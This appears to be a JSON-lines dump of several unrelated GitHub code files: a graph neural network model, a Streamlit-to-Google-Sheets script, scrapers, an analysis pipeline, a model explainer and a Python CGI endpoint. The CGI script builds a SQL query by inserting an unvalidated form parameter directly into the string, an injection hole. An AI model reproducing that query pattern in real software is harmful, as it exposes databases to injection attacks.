'all':\r\n\t\t\treturn data[edge_type].y\r\n\t\telse:\r\n\t\t\traise ValueError(\"GNN ground_truth(): mode can only be 'train', 'val', 'test' or 'all'\")\r\n\r\n\tdef inspect_node(self, data, node_idx):\r\n\t\tnode_gt = {}\r\n\t\tfor edge_from,edge_to,y in zip(self.inspect(data)[0], self.inspect(data)[1], self.ground_truth(data)):\r\n\t\t\tif edge_from == node_idx:\r\n\t\t\t\tnode_gt[edge_to] = y\r\n\t\treturn list(dict(sorted(node_gt.items(), key=lambda item: item[1], reverse=True)).keys())\r\n\r\n\tdef evaluate_nodes(self, x_dict, edge_index_dict, edge_label_index, edge_attr_dict, targets):\r\n\t\t# Compute output and give ground truths node by node - for ranking purposes\r\n\t\tpredictions = self.forward(x_dict, edge_index_dict, edge_label_index, edge_attr_dict)\r\n\t\toutputs, ground_truths = [], []\r\n\t\tfor node_idx in edge_label_index[0].unique():\r\n\t\t\tsel = torch.where(edge_label_index[0] == node_idx)\r\n\t\t\toutputs.append(predictions[sel[0]])\r\n\t\t\tground_truths.append(targets[sel[0]])\r\n\t\treturn outputs, ground_truths\r\n\r\n\tdef calculate_loss(self, pred, target, weights=None, penalize_fn=False, reduction='none'):\r\n\t\tif weights is None:\r\n\t\t\tif self.loss_function == 'cross_entropy':\r\n\t\t\t\tloss = F.binary_cross_entropy_with_logits(pred, target.float(), reduction='none')\r\n\t\t\telif self.loss_function == 'mean_square_error':\r\n\t\t\t\tloss = weighted_mse_loss(pred, target)\r\n\t\t\telif self.loss_function == 'mean_absolute_error':\r\n\t\t\t\tloss = weighted_mean_absolute_error_loss(pred, target)\r\n\t\t\telif self.loss_function == 'root_mean_square_error':\r\n\t\t\t\tloss = weighted_rmse(pred, target)\r\n\t\t\telif self.loss_function == 'pearson_correlation_coefficient':\r\n\t\t\t\tloss = pearson_correlation_coefficient(pred.flatten(), target.flatten())\r\n\t\t\telse:\r\n\t\t\t\traise Error('Model: loss function {} not implemented'.format(self.loss_function))\r\n\t\telse:\r\n\t\t\tweights = get_sample_weights(target, weights)\r\n\t\t\ttarget, indices = correct_negative_edges(target)\r\n\t\t\tif self.loss_function == 'cross_entropy':\r\n\t\t\t\t# raw_loss = F.binary_cross_entropy_with_logits(pred, target.float(), weight=torch.Tensor(weights), reduction='none')\r\n\t\t\t\t# return torch.index_select(raw_loss, dim=0, index=torch.LongTensor(indices)).mean()\r\n\t\t\t\tloss = F.binary_cross_entropy_with_logits(pred, target.float(), weight=torch.Tensor(weights), reduction='none')\r\n\t\t\telif self.loss_function == 'mean_square_error':\r\n\t\t\t\tloss = weighted_mse_loss(pred, target, weight=weights)\r\n\t\t\telif self.loss_function == 'mean_absolute_error':\r\n\t\t\t\tloss = weighted_mean_absolute_error_loss(pred, target, weight=weights)\r\n\t\t\telif self.loss_function == 'root_mean_square_error':\r\n\t\t\t\tloss = weighted_rmse(pred, target, weight=weights)\r\n\t\t\telse:\r\n\t\t\t\traise Error('Model: loss function {} not implemented'.format(self.loss_function))\r\n\r\n\t\t\r\n\t\tif penalize_fn:\r\n\t\t\tloss = penalize_false_negative(loss, pred, target)\r\n\r\n\t\tif self.loss_function == 'pearson_correlation_coefficient':\r\n\t\t\treturn torch.sub(1, loss)\r\n\t\tif reduction == 'mean':\r\n\t\t\tloss = torch.mean(loss)\r\n\t\telif reduction == 'sum':\r\n\t\t\tloss = torch.sum(loss)\r\n\t\telif reduction == 'none':\r\n\t\t\tpass\r\n\t\telse:\r\n\t\t\traise Error(\"Model: Reduction should be set to 'mean', 'sum' or 'none'\")\r\n\t\t\r\n\t\treturn loss\r\n\t\t\r\n\r\n\tdef train_graph(self, data, optimizer, weights=None, penalize_fn=False, set='train'):\r\n\t\tself.train()\r\n\t\toptimizer.zero_grad()\r\n\t\tpred = self(data.x_dict, data.edge_index_dict, self.inspect(data, mode=set), data.edge_attr_dict)\r\n\t\ttarget = self.ground_truth(data, mode=set)#.float()\r\n\t\tloss = self.calculate_loss(pred, target, weights=weights, penalize_fn=penalize_fn, reduction='mean')\r\n\t\tloss.backward()\r\n\t\t# Gradient clipping - it tends to vanish otherwise\r\n\t\tnn.utils.clip_grad_value_(self.parameters(), clip_value=1.0)\r\n\t\toptimizer.step()\r\n\t\treturn loss\r\n\t\r\n\tdef train_deterministic_graph(self, data, optimizer, activation_level, set='train'):\r\n\t\tself.train()\r\n\t\toptimizer.zero_grad()\r\n\t\tpred = self(data.x_dict, data.edge_index_dict, self.inspect(data, mode=set), data.edge_attr_dict)\r\n\t\ttarget = self.ground_truth(data, mode=set)\r\n\t\tdet_target = (target >= activation_level).float()\r\n\t\tactivated_pred = torch.sigmoid(torch.sub(pred, activation_level))\r\n\t\t# loss = torch.binary_cross_entropy_with_logits(activated_pred, target).mean()\r\n\t\tcriterion = torch.nn.BCELoss()\r\n\t\tloss = criterion(activated_pred, det_target)\r\n\t\tloss.backward()\r\n\t\t# Gradient clipping - it tends to vanish otherwise\r\n\t\tnn.utils.clip_grad_value_(self.parameters(), clip_value=1.0)\r\n\t\toptimizer.step()\r\n\t\treturn loss\r\n\r\n\t@torch.no_grad() # torch.no_grad() means that you are not computing gradients (saves computations) as we are in test mode\r\n\tdef test_graph(self, data, weights=None, penalize_fn=False, set='test'):\r\n\t\tself.eval()\r\n\t\tpred = self(data.x_dict, data.edge_index_dict, self.inspect(data, mode=set), data.edge_attr_dict)\r\n\t\ttarget = self.ground_truth(data, mode=set)#.float()\r\n\t\tloss = self.calculate_loss(pred, target, weights=weights, penalize_fn=penalize_fn, reduction='mean')\r\n\t\treturn loss\r\n\t\r\n\t@torch.no_grad()\r\n\tdef predict_graph(self, data, set='test'):\r\n\t\tself.eval()\r\n\t\treturn self(data.x_dict, data.edge_index_dict, self.inspect(data, mode=set), data.edge_attr_dict)\r\n\r\n\t@torch.no_grad()\r\n\tdef test_predict_graph(self, data, weights=None, penalize_fn=False, set='test'):\r\n\t\tself.eval()\r\n\t\tpred = self(data.x_dict, data.edge_index_dict, self.inspect(data, mode=set), data.edge_attr_dict)\r\n\t\ttarget = self.ground_truth(data, mode=set)#.float()\r\n\t\tloss = self.calculate_loss(pred, target, weights=weights, penalize_fn=penalize_fn, reduction='mean')\r\n\t\treturn pred, loss\r\n\r\n\t@torch.no_grad()\r\n\tdef test_rbo(self, data, set='test'):\r\n\t\tself.eval()\r\n\t\ttarget = self.ground_truth(data, mode=set)#.float()\r\n\t\tpredictions, ground_truths = self.evaluate_nodes(data.x_dict, data.edge_index_dict, self.inspect(data, mode=set), data.edge_attr_dict, target)\r\n\t\tcriterion = RBOLoss(reduction='mean')\r\n\t\tloss = criterion(predictions, ground_truths)\r\n\t\treturn loss.item()\r\n\r\n\t@torch.no_grad()\r\n\tdef test_pearson(self, data, set='test'):\r\n\t\tself.eval()\r\n\t\tpred = self(data.x_dict, data.edge_index_dict, self.inspect(data, mode=set), data.edge_attr_dict)\r\n\t\ttarget = self.ground_truth(data, mode=set)#.float()\r\n\t\t# pearson = PearsonCorrCoef()\r\n\t\t# loss = pearson(pred, target)\r\n\t\tloss = pearson_correlation_coefficient(pred.flatten(), target.flatten())\r\n\t\treturn loss.item()\r\n\r\n\t@torch.no_grad()\r\n\tdef test_r2(self, data, device, set='test'):\r\n\t\tself.eval()\r\n\t\tpred = self(data.x_dict, data.edge_index_dict, self.inspect(data, mode=set), data.edge_attr_dict)\r\n\t\ttarget = self.ground_truth(data, mode=set)#.float()\r\n\t\t# pearson = PearsonCorrCoef()\r\n\t\t# loss = pearson(pred, target)\r\n\t\tr2score = R2Score().to(device)\r\n\t\tloss = r2score(pred.flatten(), target.flatten())\r\n\t\treturn loss.item()\r\n\r\n\t@torch.no_grad()\r\n\tdef test_rmse(self, data, weights=None, set='test'):\r\n\t\tself.eval()\r\n\t\tpred = self(data.x_dict, data.edge_index_dict, self.inspect(data, mode=set), data.edge_attr_dict)\r\n\t\ttarget = self.ground_truth(data, mode=set)#.float()\r\n\t\tloss = weighted_mean_absolute_error_loss(pred, target, weight=weights)\r\n\t\treturn torch.mean(loss).item()\r\n\r\n\t@torch.no_grad()\r\n\tdef test_predict_missings(self, data, dataset, weights=None, penalize_fn=False):\r\n\t\tself.eval()\r\n\t\tmissing_idx = self.inspect(data, mode='missing')\r\n\t\tall_preds = self(data.x_dict, data.edge_index_dict, missing_idx, data.edge_attr_dict)\r\n\t\tmissing2chembl = dataset.get_missing_in_chembl(missing_idx, edge_type=(self.link_from, self.link_to))\r\n\t\tpred = all_preds[list(missing2chembl.keys())].detach().cpu()\r\n\t\ttarget = torch.Tensor(list(missing2chembl.values()))\r\n\t\tloss = self.calculate_loss(pred.flatten(), target.flatten(), weights=weights, penalize_fn=penalize_fn, reduction='mean')\r\n\t\treturn pred, loss, all_preds\r\n\r\n","repo_name":"SimonCrouzet/g-plip","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":13469,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"10656845498","text":"import streamlit as st\nimport pandas as pd #if you will\nimport gspread\nfrom google.oauth2 import service_account\n\n# Create a connection object.\ncredentials = service_account.Credentials.from_service_account_info(\n st.secrets[\"gcp_service_account\"],\n scopes=[\n \"https://www.googleapis.com/auth/spreadsheets\",\"https://www.googleapis.com/auth/drive\"\n ],\n)\nconn = connect(credentials=credentials)\nclient=gspread.authorize(credentials)\n\nsheet_id = '1c18r7CgRmubA2tzGgIIZJdV8Srgn2PyPVSX8tyH351Y'\ncsv_url = f\"https://docs.google.com/spreadsheets/d/1c18r7CgRmubA2tzGgIIZJdV8Srgn2PyPVSX8tyH351Y/export?format=csv\"\ndatabase_df = pd.read_csv(csv_url, on_bad_lines='skip')\n\ndatabase_df = database_df.astype(str)\nsheet_url = st.secrets[\"private_gsheets_url\"] #this information should be included in streamlit secret\nsheet = client.open_by_url(sheet_url).sheet1\nsheet.update([database_df.columns.values.tolist()] + database_df.values.tolist())\nst.success('Data has been written to Google Sheets')\n","repo_name":"ramida22/st-hello-world","sub_path":"streamlit_app.py","file_name":"streamlit_app.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"41423672076","text":"d1 = {\n \"apple\": 280,\n \"banana\": 60,\n \"cat\": 3800,\n \"dog\": 20000,\n \"egg\": 5,\n \"food\": 50\n}\n\nkey = input(\"Enter the item: \")\n\nif(d1.__contains__(key)):\n print(d1[key])\nelse:\n print(\"No such item exist..\")\n\n","repo_name":"Mahaakrish/lilly_python","sub_path":"ad.py","file_name":"ad.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"16880311282","text":"from time import sleep\nfrom structure import structure\nfrom constants import (\n OUTPUT_FILE,\n CHANNELS_NAMES,\n RIA_NEWS_KEYWORD,\n ONE_DAY_IN_SECOND\n)\n\n\ndef scrape():\n telegram_scraper = structure.telegram_scraper\n exposures_statistics_service = structure.exposures_statistics_service\n ria_news_scraper = structure.ria_news_scraper\n exposures_repository = structure.exposures_repository\n\n exposures_from_telegram_channels = telegram_scraper.scrape_channels(CHANNELS_NAMES)\n exposures_from_ria_news = ria_news_scraper.scrape(RIA_NEWS_KEYWORD)\n exposures = exposures_from_ria_news + exposures_from_telegram_channels\n statistics = exposures_statistics_service.get_statistics_by_type(exposures)\n\n exposures_repository.save_on_json_file(OUTPUT_FILE, exposures, statistics)\n\n\nif __name__ == '__main__':\n while True:\n scrape()\n sleep(ONE_DAY_IN_SECOND)\n","repo_name":"Entarudin/scraper","sub_path":"scrape_sources.py","file_name":"scrape_sources.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"23130405085","text":"from pipelines.viral_analysis_pipeline.pipeline_objs.pipeline_objs_consts import *\nfrom pathlib import Path\nfrom utils.queue_managers import load_json, dump_json\nimport pandas as pd\nfrom pipelines.viral_analysis_pipeline.analysis_helpers import _split_a_list, _calc_num_splits, _analyze_intersection_res_dir\nfrom random import shuffle\nfrom pipeline import NonRepeatingPipeline\n\ndef _prep_env(attrs: dict):\n # metadata_file = attrs[METADATA_FILE_PATH_ATTR]\n # res_file = attrs[REAL_PROP_RES_PATH_ATTR]\n virus_res_root = attrs[VIRUS_RES_ROOT_ATTR]\n\n output_root = Path(virus_res_root) / \"intersection_data\"\n\n root_path = Path(output_root)\n inter_output_dir = root_path / \"inter\"\n cross_output_dir = root_path / \"cross\"\n by_size_output_dir = root_path / \"by_size\"\n all_interactors_output_dir = root_path / \"all_interactors\"\n intersections_output_dir = root_path / \"intersection_results\"\n\n root_path.mkdir(exist_ok=True)\n inter_output_dir.mkdir(exist_ok=True)\n cross_output_dir.mkdir(exist_ok=True)\n by_size_output_dir.mkdir(exist_ok=True)\n all_interactors_output_dir.mkdir(exist_ok=True)\n intersections_output_dir.mkdir(exist_ok=True)\n\n attrs[INTER_OUTPUT_DIR_ATTR] = inter_output_dir\n attrs[CROSS_OUTPUT_DIR_ATTR] = cross_output_dir\n attrs[BY_SIZE_OUTPUT_DIR_ATTR] = by_size_output_dir\n attrs[ALL_OUTPUT_DIR_ATTR] = all_interactors_output_dir\n attrs[INTERSECTION_OUTPUT_DIR_ATTR] = intersections_output_dir\n\n\ndef _randomly_split(attrs: dict) -> dict[list[list[str]]]:\n metadata_path = attrs[METADATA_FILE_PATH_ATTR]\n prot_map = load_json(metadata_path)\n proteins = attrs.get(\"proteins\", None)\n\n if proteins is None:\n proteins = list(prot_map.keys())\n elif not isinstance(proteins, list):\n proteins = [proteins]\n\n prot_map[\"all\"] = list(set().union(*[v for v in prot_map.values()]))\n return {\n protein: [_split_a_list(prot_map[protein]) for\n i in range(_calc_num_splits(len(prot_map[protein])))]\n for protein in proteins if len(prot_map[protein]) >= 10\n }\n\n\ndef _random_cross_proteins_splits(attrs: dict):\n metadata_path = attrs[METADATA_FILE_PATH_ATTR]\n res_path = attrs[REAL_PROP_RES_PATH_ATTR]\n proteins = attrs.get(\"proteins\", None)\n\n res = pd.read_csv(res_path)\n prot_to_interactors = load_json(metadata_path)\n if proteins is None:\n proteins = [c for c in res.columns if c != \"nodes\" and not c.isnumeric()]\n\n actual_proteins = []\n for i in range(len(proteins) - 1):\n p1 = proteins[i]\n for j in range(i + 1, len(proteins)):\n p2 = proteins[j]\n key = f\"{p1},{p2}\"\n prot_to_interactors[key] = list(set(prot_to_interactors[p1]) | set(prot_to_interactors[p2]))\n actual_proteins.append(key)\n return {\n protein: [_split_a_list(prot_to_interactors[protein])\n for i in range(_calc_num_splits(len(prot_to_interactors[protein])))] for protein in actual_proteins if\n len(prot_to_interactors[protein]) >= 10\n }\n\n\ndef _split_by_size(attrs: dict):\n res_path = attrs[REAL_PROP_RES_PATH_ATTR]\n res = pd.read_csv(res_path)\n interactors_columns = [c for c in res.columns if c.isnumeric()]\n splits = dict()\n for split_size in [10, 15, 20, 30, 40]:\n shuffle(interactors_columns)\n interactors_in_split = interactors_columns[:split_size]\n splits[split_size] = [_split_a_list(interactors_in_split) for _ in range(_calc_num_splits(split_size))]\n\n return splits\n\ndef create_inter_splits_data(attrs: dict):\n inter_output_dir = attrs[INTER_OUTPUT_DIR_ATTR]\n print(f\" *********** WORKING ON SPLIT TYPE INTER ***********\")\n for i in range(10):\n splits = _randomly_split(attrs)\n dump_json(splits, str(inter_output_dir / f\"splits_{i}.json\"))\n _analyze_intersection_res_dir(inter_output_dir, attrs[INTERSECTION_OUTPUT_DIR_ATTR], \"inter\", attrs[REAL_PROP_RES_PATH_ATTR])\n\ndef create_cross_splits_data(attrs: dict):\n cross_output_dir = attrs[CROSS_OUTPUT_DIR_ATTR]\n print(f\" *********** WORKING ON SPLIT TYPE CROSS ***********\")\n for i in range(10):\n splits = _random_cross_proteins_splits(attrs)\n dump_json(splits, str(cross_output_dir / f\"splits_{i}.json\"))\n _analyze_intersection_res_dir(cross_output_dir, attrs[INTERSECTION_OUTPUT_DIR_ATTR], \"cross\",\n attrs[REAL_PROP_RES_PATH_ATTR])\n\ndef create_by_size_splits_data(attrs: dict):\n by_size_output_dir = attrs[BY_SIZE_OUTPUT_DIR_ATTR]\n print(f\" *********** WORKING ON SPLIT TYPE CROSS ***********\")\n for i in range(10):\n splits = _split_by_size(attrs)\n dump_json(splits, str(by_size_output_dir / f\"splits_{i}.json\"))\n\n _analyze_intersection_res_dir(by_size_output_dir, attrs[INTERSECTION_OUTPUT_DIR_ATTR], \"by_size\",\n attrs[REAL_PROP_RES_PATH_ATTR])\n# def create_all_splits_data(attrs:dict):\n# by_size_output_dir = attrs[BY_SIZE_OUTPUT_DIR_ATTR]\n# print(f\" *********** WORKING ON SPLIT TYPE CROSS ***********\")\n# for i in range(10):\n# splits = _split_by_size(attrs)\n# dump_json(splits, str(by_size_output_dir / f\"splits_{i}.json\"))\n\n\ndef get_pipeline(virus_name: str, reset_state: bool=False) -> NonRepeatingPipeline:\n pipe = NonRepeatingPipeline(state_suffix=virus_name + \"intersection_analysis_state\", reset_state=reset_state)\n pipe.add_steps(\n [\n _prep_env,\n create_inter_splits_data,\n create_by_size_splits_data,\n create_cross_splits_data\n ]\n )\n return pipe","repo_name":"EtayLivne/netprop_analysis","sub_path":"pipelines/viral_analysis_pipeline/pipeline_objs/intersect.py","file_name":"intersect.py","file_ext":"py","file_size_in_byte":5638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"20065822662","text":"#!/usr/bin/env python\n#coding:utf-8\n\nimport mysql\nimport cgi\nimport cgitb\ncgitb.enable()\nimport yate\nimport json\nform_data = cgi.FieldStorage()\nchid = ''\nif \"chid\" in form_data:\n chid = form_data['chid'].value\n\nprint(yate.start_response('application/json'))\nconn = mysql.connect()\ncursor = conn.cursor()\ncursor.execute(\"\"\"select live_url.live_path from live_url,tvs_channel where tvs_channel.chid=live_url.chid and live_url.chid=%s\"\"\" % chid)\nresponse = cursor.fetchall()\nresults = ''\nif response != ():\n results = response[0][0]\n \nprint(json.dumps(results))","repo_name":"yangmeitaozi/tvcloud","sub_path":"tvcloud_zb/cgi-bin/generate_data.py","file_name":"generate_data.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"24640754149","text":"from anchor import anchor_tabular\nimport asyncio\nimport numpy as np\nimport pandas\nimport random\nimport requests\nimport itertools\nimport json\nfrom tensorflow.python.lib.io import file_io\nfrom pandas.compat import StringIO\n\nimport utils\n\nREGRESSION = 'regression'\nCLASSIFICATION = 'classification'\n\n\nclass Explainer:\n\n def __cmle_predict(self, record):\n name = 'projects/{}/models/{}'.format(self.__gcp_project, self.__gcp_model)\n if self.__gcp_model_version is not None:\n name += '/versions/{}'.format(self.__gcp_model_version)\n\n url = 'https://ml.googleapis.com/v1/' + name + ':predict'\n \n result = requests.post(\n url,\n json={'instances': record},\n headers={\n 'Authorization':'Bearer ' + self.__access_token})\n\n response = json.loads(result.text)\n try:\n return response['predictions']\n except:\n print('record', record)\n print('response',response)\n return response['predictions']\n\n\n def __get_label_values (self):\n cat_labels = utils.load_csv_dataset(\n data=StringIO(self.__csv_file),\n feature_names = self.__feature_names,\n target_idx = -1,\n skip_first = self.__skip_first,\n categorical_features = [],\n features_to_use= [self.__target_idx],\n discretize = True\n ).categorical_names[0]\n self.__categorical_labels = [\n bytes(\n x,\n 'utf-8') for x in cat_labels]\n return [float(\n cat_labels[i].split(\n ' <= ')[-1]) for i in range(9)]\n\n\n\n def __create_transform_func(self, quant_val):\n\n def transfrom_labels(r):\n labels = []\n for x in r:\n x = float(x)\n if x <= quant_val[0]:\n labels.append(\n self.__categorical_labels[0])\n if x > quant_val[0] and x <= quant_val[1]:\n labels.append(\n self.__categorical_labels[1])\n if x > quant_val[1] and x <= quant_val[2]:\n labels.append(\n self.__categorical_labels[2])\n if x > quant_val[2] and x <= quant_val[3]:\n labels.append(\n self.__categorical_labels[3])\n if x > quant_val[3] and x <= quant_val[4]:\n labels.append(\n self.__categorical_labels[4])\n if x > quant_val[4] and x <= quant_val[5]:\n labels.append(\n self.__categorical_labels[5])\n if x > quant_val[5] and x <= quant_val[6]:\n labels.append(\n self.__categorical_labels[6])\n if x > quant_val[6] and x <= quant_val[7]:\n labels.append(\n self.__categorical_labels[7])\n if x > quant_val[7] and x <= quant_val[8]:\n labels.append(\n self.__categorical_labels[8])\n if x > quant_val[8]:\n labels.append(\n self.__categorical_labels[9])\n return labels\n\n return transfrom_labels\n\n\n def __get_value_mapper(self):\n self.__col_buckets=[]\n for i in range(0,len(\n self.__explainer.categorical_names)):\n \n if i in self.__dataset.ordinal_features:\n \n cols = [(\n float('-inf'),\n float(\n self.__explainer.categorical_names[i][0].split(' <= ')[-1]))]\n for mid in self.__explainer.categorical_names[i][1:-1]:\n cols.append((\n float(mid.split(' < ')[0]),\n float(mid.split(' <= ')[-1])))\n cols.append((\n float(\n self.__explainer.categorical_names[i][-1].split(' > ')[-1]),\n float('inf')))\n self.__col_buckets.append(cols)\n \n else: \n self.__col_buckets.append(self.__explainer.categorical_names[i])\n\n tr_data = pandas.read_csv(\n StringIO(self.__csv_file),\n header = 0,\n names = self.__feature_names,\n delimiter=',',\n na_filter=True,\n dtype=str).fillna(\"-1\").values\n del self.__csv_file\n tr_data = tr_data[:, self.__features_to_use]\n \n\n val_buckets = []\n for col in range(tr_data.shape[1]):\n \n if col in self.__dataset.ordinal_features:\n \n val_list = {i:[] for i in range(len(self.__col_buckets[col]))}\n for val in tr_data[:,col]:\n for buck in range(len(self.__col_buckets[col])):\n if float(\n val) > self.__col_buckets[col][buck][0] and float(\n val) <= self.__col_buckets[col][buck][1]:\n\n val_list[buck].append(float(val))\n break\n val_buckets.append(\n [int(np.median(val_list[buck])) if np.median(val_list[buck]).is_integer() else np.median(\n val_list[buck]) for buck in range(len(self.__col_buckets[col]))])\n else:\n val_buckets.append(self.__col_buckets[col])\n\n return list(itertools.chain.from_iterable(val_buckets))\n\n\n\n def __encode_record(self, record):\n encoded = []\n for val in range(\n len(record)):\n \n if val in self.__dataset.ordinal_features:\n for buck in range(\n len(self.__col_buckets[val])):\n if float(\n record[val]) > self.__col_buckets[val][buck][0] and float(\n record[val]) <= self.__col_buckets[val][buck][1]:\n\n encoded.append(buck)\n break\n else:\n for buck in range(\n len(self.__col_buckets[val])):\n if record[val] == self.__col_buckets[val][buck]:\n encoded.append(buck)\n break\n return np.array(encoded)\n \n \n def __decode_record(self, record):\n return list(itertools.compress(\n self.__value_mapper,\n record.todense().astype(\n int).tolist()[0]))\n \n \n def __predict(self, record):\n\n if self.__csv_record:\n pred_data = [','.join(self.__pre_pad + [\n str(\n x) for x in self.__decode_record(\n record[i,:])] + self.__post_pad) for i in range(\n record.shape[0])]\n \n else:\n pred_data = [dict(zip(\n self.__dataset.feature_names,\n self.__decode_record(\n record[i,:])))for i in range(\n record.shape[0])]\n \n predictions = self.__cmle_predict(pred_data)\n predictions = [self.__output_func(x) for x in predictions]\n if self.model_type == REGRESSION:\n predictions = self.__transform_labels(predictions)\n predictions = [self.__label_map[x] for x in predictions]\n predictions = np.array(predictions)\n return predictions\n\n \n \n def load_data(\n self,\n gcs_path,\n target_idx,\n features_to_use=None,\n categorical_features=[],\n feature_names=None,\n skip_first=False\n ):\n \n self.__target_idx = target_idx\n self.__features_to_use = features_to_use\n self.__feature_names = feature_names\n self.__skip_first = skip_first\n \n self.__numeric_features = list(set(\n features_to_use).difference(\n set(categorical_features)))\n \n self.__csv_file = file_io.FileIO(\n gcs_path,\n mode='r').read()\n \n if self.model_type == REGRESSION:\n self.__transform_labels = self.__create_transform_func(\n self.__get_label_values())\n \n self.__dataset = utils.load_csv_dataset(\n data=StringIO(self.__csv_file),\n feature_names = feature_names,\n skip_first = skip_first,\n target_idx =target_idx,\n categorical_features = categorical_features,\n features_to_use= features_to_use,\n discretize = True,\n feature_transformations = {\n target_idx : self.__transform_labels\n })\n else:\n self.__dataset = utils.load_csv_dataset(\n data=StringIO(self.__csv_file),\n feature_names = feature_names,\n skip_first = skip_first,\n target_idx =target_idx,\n categorical_features = categorical_features,\n features_to_use= features_to_use,\n discretize = True)\n\n \n self.__label_map = {\n self.__dataset.class_names[i] : i for i in range(\n len(self.__dataset.class_names))}\n \n self.__explainer = anchor_tabular.AnchorTabularExplainer(\n self.__dataset.class_names,\n self.__dataset.feature_names,\n self.__dataset.data,\n self.__dataset.categorical_names,\n self.__dataset.ordinal_features)\n \n self.__explainer.fit(\n self.__dataset.train,\n self.__dataset.labels_train,\n self.__dataset.validation,\n self.__dataset.labels_validation)\n \n self.__value_mapper = self.__get_value_mapper()\n \n def create_cmle_client(\n self,\n gcp_project,\n gcp_model,\n access_token,\n gcp_model_version=None,\n csv_record=True,\n padding = (1,0),\n output_func = lambda x: x[\n 'predictions'][0]):\n \n self.__gcp_project = gcp_project\n self.__gcp_model = gcp_model\n self.__csv_record = csv_record\n self.__gcp_model_version = gcp_model_version\n self.__pre_pad = ['0' for _ in range(padding[0])]\n self.__post_pad = ['0' for _ in range(padding[1])]\n self.__output_func = output_func\n self.__access_token = access_token\n \n \n def __assess_sample(\n self,\n idx):\n if self.__explainer.class_names[\n self.__dataset.labels_test[idx]] == self.__predict_record(\n self.__one_hot_encode(\n self.__dataset.test[idx])):\n return 1\n else:\n return 0\n \n \n async def __assess_model(\n self,\n sample):\n \n loop = asyncio.get_event_loop()\n samples = [\n loop.run_in_executor(\n None,\n self.__assess_sample,\n idx) for idx in random.sample(\n range(len(self.__dataset.test)),\n sample)]\n responses = [await s for s in samples]\n \n return sum(responses)\n \n def assess_model(\n self,\n sample=100):\n \n self.__check_requisites()\n \n accurate = self.__event_loop.run_until_complete(\n self.__assess_model(sample))\n\n return {'accuracy' : accurate/float(sample)}\n\n \n def __explain_sample(\n self,\n idx,\n threshold):\n\n anchor = {}\n\n anchor['prediction'] = self.__predict_record(\n self.__one_hot_encode(\n self.__dataset.test[idx]))\n exp = self.__explainer.explain_instance(\n self.__dataset.test[idx],\n self.__predict,\n threshold,\n delta=0.05, tau=0.1, batch_size=10,\n max_anchor_size=10)\n \n anchor['precision'] = exp.precision()\n anchor['coverage'] = exp.coverage()\n anchor['anchor'] = ' AND '.join(exp.names())\n\n return anchor\n \n \n async def __explain_model(\n self,\n threshold,\n sample):\n\n loop = asyncio.get_event_loop()\n samples = [\n loop.run_in_executor(\n None,\n self.__explain_sample,\n idx,\n threshold) for idx in random.sample(\n range(len(self.__dataset.test)),\n sample)]\n return [await s for s in samples]\n\n \n def explain_model(\n self,\n threshold = 0.95,\n sample = 100):\n \n self.__check_requisites()\n \n anchors = self.__event_loop.run_until_complete(\n self.__explain_model(threshold, sample))\n \n return pandas.DataFrame(\n anchors).drop_duplicates(\n ['anchor']).sort_values(\n 'coverage',\n ascending = False).reset_index()[[\n 'anchor',\n 'coverage',\n 'precision',\n 'prediction']]\n \n \n def __explain_record(\n self,\n record,\n threshold,\n delta,\n tau,\n batch_size,\n max_anchor_size,\n show_in_notebook = False):\n \n one_hot_record = self.__one_hot_encode(record)\n\n pred = self.__predict_record(one_hot_record)\n\n exp = self.__explainer.explain_instance(\n record,\n self.__predict,\n threshold,\n delta=delta,\n tau=tau,\n batch_size=batch_size,\n max_anchor_size=max_anchor_size)\n\n if show_in_notebook:\n exp.show_in_notebook()\n\n return {\n 'anchor': ' AND '.join(exp.names()),\n 'precision': exp.precision(),\n 'coverage' : exp.coverage(),\n 'prediction' : pred,\n 'record': self.__decode_record(one_hot_record)}\n\n \n def explain_record(\n self,\n record,\n threshold = 0.95,\n delta=0.05,\n tau=0.2,\n batch_size=100,\n max_anchor_size=20,\n show_in_notebook = False):\n \n self.__check_requisites()\n \n record = self.__encode_record(\n record)\n \n return self.__explain_record(\n record,\n threshold,\n delta,\n tau,\n batch_size,\n max_anchor_size,\n show_in_notebook)\n \n \n def explain_random_record(\n self,\n threshold = 0.95,\n delta=0.05,\n tau=0.2,\n batch_size=100,\n max_anchor_size=20,\n show_in_notebook = False):\n \n self.__check_requisites()\n \n idx = random.randint(0,len(self.__dataset.test))\n return self.__explain_record(\n self.__dataset.test[idx],\n threshold,\n delta,\n tau,\n batch_size,\n max_anchor_size,\n show_in_notebook)\n \n \n def __check_requisites(self):\n if not '_Explainer__explainer' in self.__dict__:\n raise Exception(\n 'Please load a dataset using load_data(...)')\n if not '_Explainer__gcp_model' in self.__dict__:\n raise Exception(\n 'Please create a cmle client using create_cmle_client(...)')\n \n def __one_hot_encode(self, record):\n\n return self.__explainer.encoder.transform(\n record.reshape(1, -1))\n \n def __predict_record(\n self,\n record):\n return self.__explainer.class_names[list(\n self.__predict(record))[0]]\n \n\n def __init__(\n self,\n model_type = REGRESSION\n ):\n self.model_type = model_type\n self.__event_loop = asyncio.new_event_loop()\n \n","repo_name":"lukmanr/ml-explainability","sub_path":"anchor/anchor_explainer.py","file_name":"anchor_explainer.py","file_ext":"py","file_size_in_byte":16010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30166331569","text":"class Solution:\n def sift_down( self, arr, n, i ):\n largest = i\n l = i * 2 + 1\n r = i * 2 + 2\n \n if l < n and arr[ l ] > arr[ largest ]:\n largest = l\n if r < n and arr[ r ] > arr[ largest ]:\n largest = r\n if largest != i:\n arr[ largest ], arr[ i ] = arr[ i ], arr[ largest ]\n self.sift_down( arr, n, largest )\n \n def sift_up( self, arr, n, i ):\n if i == 0:\n return\n par = ( i - 1 ) // 2\n \n if( arr[ par ] < 